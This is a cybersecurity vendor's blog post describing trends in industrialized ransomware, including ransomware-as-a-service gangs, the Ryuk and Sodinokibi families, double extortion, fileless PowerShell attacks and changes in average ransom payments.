Critical infrastructure attacks and sky-high ransoms are just the beginning.
Ransomware isn’t new, but the industrial complex behind today’s biggest attacks certainly is.
Only a few years ago, ransom demands from cybercriminal gangs were mostly four- or five-figure sums, but these early successes have spurred today’s cybercriminals to demand millions of dollars – and to receive a payment !
Ransom amounts have increased along with the sophistication and scalability of today’s most popular ransomware variants. Cybercrime is a multi-billion dollar global industry, and it is growing tremendously year on year.
BlackFog collects and analyzes data from the ransomware industry, which allows us to stay ahead of trends and protect our customers against the latest threats. Some of the information we have gathered over the past few months indicates an alarming consolidation of cybercrime resources that will lead to new attacks making headlines in the months to come.
What does consolidated industrialized cybercrime look like?
Most of the data we analyzed throughout the year indicates significant consolidation efforts in the world of cybercrime. A handful of very active ransomware-as-a-service vendors dominate the landscape and provide infrastructure support to a loose confederation of hackers around the world.
These “ransomware gangs” function more like enterprise managed service providers. They hire specialist developers and group them into separate departments. They have dedicated accounting teams, territory-specific negotiators and executive officers.
These are not lone wolf operations, and they haven’t been for a long time.
In fact, the major cybercrime vendors consolidate their resources and analyze their performance to maximize results. More than half of all serialized ransomware attacks use software from two distinct families: Ryuk and Sodinokibi.
Ryuk is responsible for a large number of attacks on hospitals and other essential pieces of critical infrastructure. Ryuk-type ransomware was responsible for last year’s $ 67 million attack on Universal Health Services and the ensuing wave of attacks on U.S. healthcare operators.
Sodinokibi is the name of the ransomware used by REvil and is involved in many high cost and high profile attacks such as Kaseya. It is increasingly used in double extortion attacks, where attackers demand a ransom to restore system functionality and another to avoid disclosing sensitive data to the public.
While these two ransomware families operate in totally different ways, they do share some key similarities. Both use PowerShell exploits to execute ransomware code entirely in memory and download payloads remotely – a completely fileless approach.
BlackFog research shows that 78% of all attacks now use PowerShell exploits, rendering file-based detection and prevention methods obsolete. PowerShell exploits do not produce an attack signature like file-based ransomware does. More than eight in ten attacks threaten to infiltrate data, making possible double exploitation.
Consolidation doesn’t mean predictability
It might be tempting to think that if large cybercrime organizations consolidate themselves, they might start using more predictable approaches. Unfortunately, the opposite is more likely. With greater resources, led by a more organized executive structure, cybercrime organizations will be able to provide more diverse and sophisticated ransomware services to their clients.
One of the most interesting developments of the past year supports this theory. The average ransom payment for the second quarter of 2021 is actually lower than the previous quarter. At $ 135,576, the average ransom note is 38% lower than it was just a few months ago.
The fundamentals of industrialized cybercrime have not changed significantly during this time, so it is unlikely that cybercriminals simply decided to be more modest in their financial goals.